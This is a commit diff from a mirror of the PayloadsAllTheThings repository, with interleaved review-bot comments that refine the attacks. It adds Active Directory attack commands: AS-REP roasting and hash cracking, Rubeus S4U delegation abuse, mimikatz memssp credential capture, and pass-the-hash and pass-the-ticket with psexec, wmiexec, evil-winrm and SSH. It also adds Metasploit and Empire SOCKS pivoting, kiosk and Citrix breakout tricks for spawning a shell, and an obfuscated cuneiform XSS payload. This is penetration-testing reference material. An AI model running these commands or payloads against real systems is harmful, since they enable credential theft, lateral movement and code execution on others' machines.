mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Application Escape and Breakout
This commit is contained in:
parent
973f091d1b
commit
f7e8f515a5
6 changed files with 171 additions and 10 deletions
|
@ -1126,7 +1126,7 @@ Mitigations:
|
|||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||
|
||||
Prerequisite:
|
||||
- Accounts have to have **DONT_REQ_PREAUTH**
|
||||
- Accounts have to have **DONT_REQ_PREAUTH** (`PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose`)
|
||||
|
||||
```powershell
|
||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||
|
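Review bot: the prerequisite only gives the PowerView way to find DONT_REQ_PREAUTH accounts; stating the underlying flag (UF_DONT_REQUIRE_PREAUTH, 0x400000) next to it would let readers audit with a plain LDAP filter such as `(userAccountControl:1.2.840.113556.1.4.803:=4194304)` when PowerView is not available. Also, the unchanged `C:\>git clone https://github.com/GhostPack/Rubeus#asreproast` line carries a URL fragment that git ignores; `#asreproast` belongs in a link to the Rubeus README, not in the clone URL.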
@ -1178,6 +1178,7 @@ root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4r
|
|||
|
||||
# crack AS_REP messages
|
||||
root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
root@windows:hashcat$ hashcat64.exe -m 18200 '<AS_REP-hash>' -a 0 c:\wordlists\rockyou.txt
|
||||
```
|
||||
|
||||
Mitigations:
|
||||
|
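Review bot: the added Windows line will not run as written in cmd.exe: single quotes are not quoting characters there, so `'<AS_REP-hash>'` is passed literally with the quotes included. Pass the hash through a file, as the Linux line above does with `hashes.asreproast`, or use double quotes. Two smaller points: `hashcat64.exe` is the binary name of older releases (current releases ship `hashcat.exe`), and the `root@windows:hashcat$` prompt imitates a Unix shell; a `C:\hashcat>` prompt would match the other Windows examples in this file.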
@ -1806,9 +1807,9 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||
5. Use Rubeus to get hash from password
|
||||
|
||||
```powershell
|
||||
Rubeus.exe hash /password:'Weakest123*' /user:swktest /domain:factory.lan
|
||||
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
|
||||
[*] Input password : Weakest123*
|
||||
[*] Input username : swktest
|
||||
[*] Input username : swktest$
|
||||
[*] Input domain : factory.lan
|
||||
[*] Salt : FACTORY.LANswktest
|
||||
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
|
||||
|
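Review bot: changing the input to `/user:swktest$` leaves the unchanged `[*] Salt : FACTORY.LANswktest` output line inconsistent. For a computer account the Kerberos salt is of the form `FACTORY.LANhostswktest.factory.lan`, not the user-account form shown, so the output block should be regenerated from the new command. The `rc4_hmac` value is salt-independent and stays the same, but the regenerated output would also show the AES keys, which is what the next hunk's `/aes256:` example needs.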
@ -1821,6 +1822,7 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||
|
||||
```powershell
|
||||
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||||
|
||||
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
|
||||
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
|
||||
|
|
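Review bot: the `/rc4:` and `/aes256:` lines are alternatives, not a sequence, but nothing says so; a one-line comment such as `# or with the AES key` between them would make that clear. Since AES keys are salted, the `/aes256:` key only matches the account if it was derived with the computer-account salt (the `swktest$` form), which is another reason to regenerate the `hash` output in the previous hunk rather than keep the user-account salt line.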
111
Methodology and Resources/Escape Breakout.md
Normal file
|
@ -0,0 +1,111 @@
|
|||
# Application Escape and Breakout
|
||||
|
||||
## Summary
|
||||
|
||||
* [Gaining a command shell](#gaining-a-command-shell)
|
||||
* [Sticky Keys](#explorer---sticky-keys)
|
||||
* [Dialog Boxes](#dialog-boxes)
|
||||
* [Creating new files](#creating-new-files)
|
||||
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
|
||||
* [Exploring Context Menus](#exploring-context-menus)
|
||||
* [Save as](#save-as)
|
||||
* [Input Boxes](#input-boxes)
|
||||
* [Bypass file restrictions](#bypass-file-restrictions)
|
||||
* [Internet Explorer](#internet-explorer)
|
||||
* [Shell URI Handlers](#shell-uri-handlers)
|
||||
* [References](#references)
|
||||
|
||||
## Gaining a command shell
|
||||
|
||||
* **Shortcut**
|
||||
* [Window] + [R] -> cmd
|
||||
* [CTRL] + [ALT] + [SHIFT] -> Task Manager
|
||||
* **Access through file browser**: Browsing to the folder containing the binary (i.e. `C:\windows\system32\`), we can simply right click and `open` it
|
||||
* **Drag-and-drop**: dragging and dropping any file onto the cmd.exe
|
||||
* **Hyperlink**: `file:///c:/Windows/System32/cmd.exe`
|
||||
* **Task Manager**: `File` > `New Task (Run...)`
|
||||
* **MSPAINT.exe**
|
||||
* Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
|
||||
* Zoom in to make the following tasks easier
|
||||
* Using the colour picker, set pixels values to (from left to right):
|
||||
* 1st: R: 10, G: 0, B: 0
|
||||
* 2nd: R: 13, G: 10, B: 13
|
||||
* 3rd: R: 100, G: 109, B: 99
|
||||
* 4th: R: 120, G: 101, B: 46
|
||||
* 5th: R: 0, G: 0, B: 101
|
||||
* 6th: R: 0, G: 0, B: 0
|
||||
* Save it as 24-bit Bitmap (*.bmp;*.dib)
|
||||
* Change its extension from bmp to bat and run
|
||||
|
||||
|
||||
## Sticky Keys
|
||||
|
||||
* Spawn the sticky keys dialog
|
||||
* Via Shell URI : `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}`
|
||||
* Hit 5 times [SHIFT]
|
||||
* Visit "Ease of Access Center"
|
||||
* You land on "Setup Sticky Keys", move up a level on "Ease of Access Center"
|
||||
* Start the OSK (On-Screen-Keyboard)
|
||||
* You can now use the keyboard shortcut (CTRL+N)
|
||||
|
||||
## Dialog Boxes
|
||||
|
||||
### Creating new files
|
||||
|
||||
* Batch files – Right click > New > Text File > rename to .BAT (or .CMD) > edit > open
|
||||
* Shortcuts – Right click > New > Shortcut > `%WINDIR%\system32`
|
||||
|
||||
## Open a new Windows Explorer instance
|
||||
|
||||
* Right click any folder > select `Open in new window`
|
||||
|
||||
## Exploring Context Menus
|
||||
|
||||
* Right click any file/folder and explore context menus
|
||||
* Clicking `Properties`, especially on shortcuts, can yield further access via `Open File Location`
|
||||
|
||||
### Save as
|
||||
|
||||
* "Save as" / "Open as" option
|
||||
* "Print" feature – selecting "print to file" option (XPS/PDF/etc)
|
||||
* `\\127.0.0.1\c$\Windows\System32\` and execute `cmd.exe`
|
||||
|
||||
### Input Boxes
|
||||
|
||||
Many input boxes accept file paths; try all inputs with UNC paths such as `//attacker–pc/` or `//127.0.0.1/c$` or `C:\`
|
||||
|
||||
|
||||
### Bypass file restrictions
|
||||
|
||||
Enter *.* or *.exe or similar in `File name` box
|
||||
|
||||
## Internet Explorer
|
||||
|
||||
### Download and Run/Open
|
||||
|
||||
* Text files -> opened by Notepad
|
||||
|
||||
### Menus
|
||||
|
||||
* The address bar
|
||||
* Search menus
|
||||
* Help menus
|
||||
* Print menus
|
||||
* All other menus that provide dialog boxes
|
||||
|
||||
## Shell URI Handlers
|
||||
|
||||
* shell:DocumentsLibrary
|
||||
* shell:Librariesshell:UserProfiles
|
||||
* shell:Personal
|
||||
* shell:SearchHomeFolder
|
||||
* shell:System shell:NetworkPlacesFolder
|
||||
* shell:SendTo
|
||||
* shell:Common Administrative Tools
|
||||
* shell:MyComputerFolder
|
||||
* shell:InternetFolder
|
||||
|
||||
## References
|
||||
|
||||
* [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
|
||||
* [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
|
|
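Review bot: the summary link `[Sticky Keys](#explorer---sticky-keys)` does not resolve: the heading is `## Sticky Keys`, whose generated anchor is `#sticky-keys`. Other points in this file: `shell:Librariesshell:UserProfiles` and `shell:System shell:NetworkPlacesFolder` are each two handlers merged into one list item; `[CTRL] + [ALT] + [SHIFT]` is not a Task Manager shortcut (Ctrl+Shift+Esc is, and Ctrl+Alt+Del opens the security screen that offers it); `i.e. C:\windows\system32\` should read `e.g.`; heading levels are mixed, with `## Open a new Windows Explorer instance` and `## Exploring Context Menus` placed between the `###` subsections of `## Dialog Boxes`; and `//attacker–pc/` contains an en dash where a hyphen is meant.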
@ -138,7 +138,12 @@ or
|
|||
|
||||
# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
|
||||
run autoroute -s 192.168.15.0/24
|
||||
use auxiliary/server/socks4a
|
||||
use auxiliary/server/socks_proxy
|
||||
set SRVPORT 9090
|
||||
set VERSION 4a
|
||||
# or
|
||||
use auxiliary/server/socks4a # (deprecated)
|
||||
|
||||
|
||||
# Meterpreter list all active routes
|
||||
run autoroute -p
|
||||
|
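Review bot: `set SRVPORT 9090` moves the listener off the socks_proxy default of 1080, so any proxychains configuration pointing at this proxy must use 9090 too; a comment saying so, or keeping the default, avoids a silent mismatch. `set VERSION 4a` is the right option name for socks_proxy (the alternative is `5`, which supports authentication). The `use auxiliary/server/socks4a # (deprecated)` fallback would be more useful with the Metasploit version in which the module was removed, otherwise the line will linger indefinitely.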
@ -152,6 +157,15 @@ route delete 192.168.14.0 255.255.255.0 3
|
|||
route flush
|
||||
```
|
||||
|
||||
## Empire
|
||||
|
||||
```powershell
|
||||
(Empire) > socksproxyserver
|
||||
(Empire) > use module management/invoke_socksproxy
|
||||
(Empire) > set remoteHost 10.10.10.10
|
||||
(Empire) > run
|
||||
```
|
||||
|
||||
## sshuttle
|
||||
|
||||
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
|
||||
|
|
|
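Review bot: the four Empire lines are issued from two different menus but share one `(Empire) >` prompt. `socksproxyserver` starts the local SOCKS listener, while `use module management/invoke_socksproxy`, `set remoteHost 10.10.10.10` and `run` are issued from an agent's menu, whose prompt is `(Empire: <agent>) >`; showing that prompt, and stating that `remoteHost` must point at the machine running `socksproxyserver`, would make the flow unambiguous. The block is also tagged `powershell` although it contains Empire console input.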
@ -79,13 +79,13 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
|||
mimikatz # sekurlsa::logonpasswords
|
||||
```
|
||||
|
||||
- LSA is running as virtualized process (LSAISO) by Credential Guard
|
||||
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
|
||||
```powershell
|
||||
# Check if a process called lsaiso.exe exists on the running processes
|
||||
tasklist |findstr lsaiso
|
||||
|
||||
# If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
|
||||
#Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
|
||||
# Lets inject our own malicious Security Support Provider into memory
|
||||
# require mimilib.dll in the same folder
|
||||
mimikatz # misc::memssp
|
||||
|
||||
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
|
||||
|
|
|
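Review bot: the added comment `# require mimilib.dll in the same folder` does not match `misc::memssp`: that command patches LSASS in memory and needs no file on disk, which is why the following line reports the log at `c:\windows\system32\mimilsa.log`. `mimilib.dll` is what the registry-based SSP variant (adding the DLL to `Security Packages`) needs, and that variant logs to `kiwissp.log` instead; either drop the comment or move it to a description of that variant. While here, fix `tou` to `to` in the unchanged comment line.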
@ -7,8 +7,8 @@
|
|||
* [TIP 2 - Retail Credential](#tip-2-retail-credential)
|
||||
* [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount)
|
||||
* [Metasploit](#metasploit)
|
||||
* [Metasploit - SMB](#metasploit-smb)
|
||||
* [Metasploit - Psexec](#metasploit-psexec)
|
||||
* [Metasploit - SMB](#metasploit---smb)
|
||||
* [Metasploit - Psexec](#metasploit---psexec)
|
||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||
* [WinRM](#winrm)
|
||||
* [Powershell Remoting](#powershell-remoting)
|
||||
|
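Review bot: the renamed anchors `#metasploit---smb` and `#metasploit---psexec` match how the renderer slugs ` - ` (three hyphens), but the unchanged `#tip-3-sandbox-credrential-wdagutilityaccount` entry still carries the typo `credrential`; check it against the actual heading, since the link only works if both sides spell it the same way.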
@ -20,6 +20,8 @@
|
|||
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
|
||||
* [Netuse](#netuse)
|
||||
* [Runas](#runas)
|
||||
* [Pass the Ticket](#pass-the-ticket)
|
||||
* [SSH](#ssh)
|
||||
|
||||
## TIPS
|
||||
|
||||
|
@ -87,6 +89,7 @@ use exploit/windows/smb/psexec
|
|||
set RHOST 10.2.0.3
|
||||
set SMBUser username
|
||||
set SMBPass password
|
||||
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
|
||||
set PAYLOAD windows/meterpreter/bind_tcp
|
||||
run
|
||||
shell
|
||||
|
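Review bot: `set SMBPass password` and `set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c` are consecutive, so the second silently overrides the first. Mark the hash line as the pass-the-hash alternative with a comment, for example `# or pass the hash (LM:NT format)`, and note that when LM storage is disabled the LM half is the empty-LM constant `aad3b435b51404eeaad3b435b51404ee`, as the wmiexec example elsewhere in this commit uses.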
@ -123,6 +126,7 @@ Require:
|
|||
root@payload$ git clone https://github.com/Hackplayers/evil-winrm
|
||||
root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
|
||||
root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
|
||||
root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
|
||||
```
|
||||
|
||||
or using a custom ruby code to interact with the WinRM service.
|
||||
|
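Review bot: the three invocations use three different entry points (`evil-winrm`, `evil-winrm.rb`, `ruby evil-winrm.rb`); the usage line shows the gem's `evil-winrm` command, so the two examples should use the same form. The added `-H BD1C6503987F8FF006296118F359FA79` example expects the NT hash alone, unlike the `LM:NT` pair Impacket takes elsewhere in this commit; a short comment on that difference would save readers a failed attempt.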
@ -190,7 +194,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
|
|||
|
||||
## Psexec.py / Smbexec.py / Wmiexec.py
|
||||
|
||||
from Impacket
|
||||
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
|
||||
|
||||
```powershell
|
||||
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
|
||||
|
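Review bot: the new link points at `SecureAuthCorp/impacket`, while the unchanged `git clone https://github.com/CoreSecurity/impacket.git` line just below still uses the old organisation; both should use the same URL. The `renamed to impacket-xxx in Kali` note would be clearer with a concrete name, for instance `impacket-wmiexec`.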
@ -204,6 +208,8 @@ root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10
|
|||
|
||||
# A semi-interactive shell, used through Windows Management Instrumentation.
|
||||
root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10
|
||||
root@payload$ wmiexec.py domain.local/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
|
||||
|
||||
|
||||
# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints.
|
||||
root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10
|
||||
|
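Review bot: the two wmiexec lines mix `python wmiexec.py` and a bare `wmiexec.py`; use one form. A comment on `-hashes` would help: the argument is `LM:NT`, and `aad3b435b51404eeaad3b435b51404ee` is the constant hash of an empty LM password, which is what a dump from a host with LM storage disabled returns.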
@ -289,6 +295,24 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
|||
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||
```
|
||||
|
||||
## Pass the Ticket
|
||||
|
||||
```powershell
|
||||
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local/user
|
||||
[*] Saving ticket in user.ccache
|
||||
cp user.ccache /tmp/krb5cc_0
|
||||
export KRB5CCNAME=/tmp/krb5cc_0
|
||||
klist
|
||||
```
|
||||
|
||||
## SSH
|
||||
|
||||
:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!
|
||||
|
||||
```ps1
|
||||
cp user.ccache /tmp/krb5cc_1045
|
||||
ssh -o GSSAPIAuthentication=yes user@domain.local -vv
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
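Review bot: the SSH section does not work as written after the Pass the Ticket block: that block exports `KRB5CCNAME=/tmp/krb5cc_0`, so copying the ticket to `/tmp/krb5cc_1045` is ignored unless `KRB5CCNAME` is unset or re-exported (the `/tmp/krb5cc_<uid>` default only applies when the variable is not set). `ssh -o GSSAPIAuthentication=yes user@domain.local` also targets the domain name rather than a host; GSSAPI requests a `host/<fqdn>` service ticket, so the target should be the server's FQDN. Smaller points: the warning sentence is missing its closing parenthesis, both fences are tagged `powershell`/`ps1` but hold Linux shell commands, and `runas /noprofil` in the context line is a typo for `/noprofile`.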
@ -49,6 +49,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||
- [Bypass ";" using another character](#bypass-using------using-another-character)
|
||||
- [Bypass using HTML encoding](#bypass-using-html-encoding)
|
||||
- [Bypass using Katana](#bypass-using-katana)
|
||||
- [Bypass using Cuneiform](#bypass-using-cuneiform)
|
||||
- [Bypass using Lontara](#bypass-using-lontara)
|
||||
- [Bypass using ECMAScript6](#bypass-using-ecmascript6)
|
||||
- [Bypass using Octal encoding](#bypass-using-octal-encoding)
|
||||
|
@ -834,6 +835,15 @@ Using the [Katakana](https://github.com/aemkei/katakana.js) library.
|
|||
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
|
||||
```
|
||||
|
||||
### Bypass using Cuneiform
|
||||
|
||||
```javascript
|
||||
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
|
||||
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
|
||||
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
|
||||
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
|
||||
```
|
||||
|
||||
### Bypass using Lontara
|
||||
|
||||
```javascript
|
||||
|
|
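Review bot: the Cuneiform section has no lead sentence, unlike `Using the Katakana library` above it; it should state that the payload relies on ES2015 identifier rules, since cuneiform characters are astral-plane letters that engines only accept as identifiers once they implement code-point based `ID_Start`, which limits where the bypass applies. The expression is split across four lines inside one statement; that is valid because each break falls before a `+` or after a `,`, but a comment saying the block is a single expression would stop readers from treating the lines as separate statements.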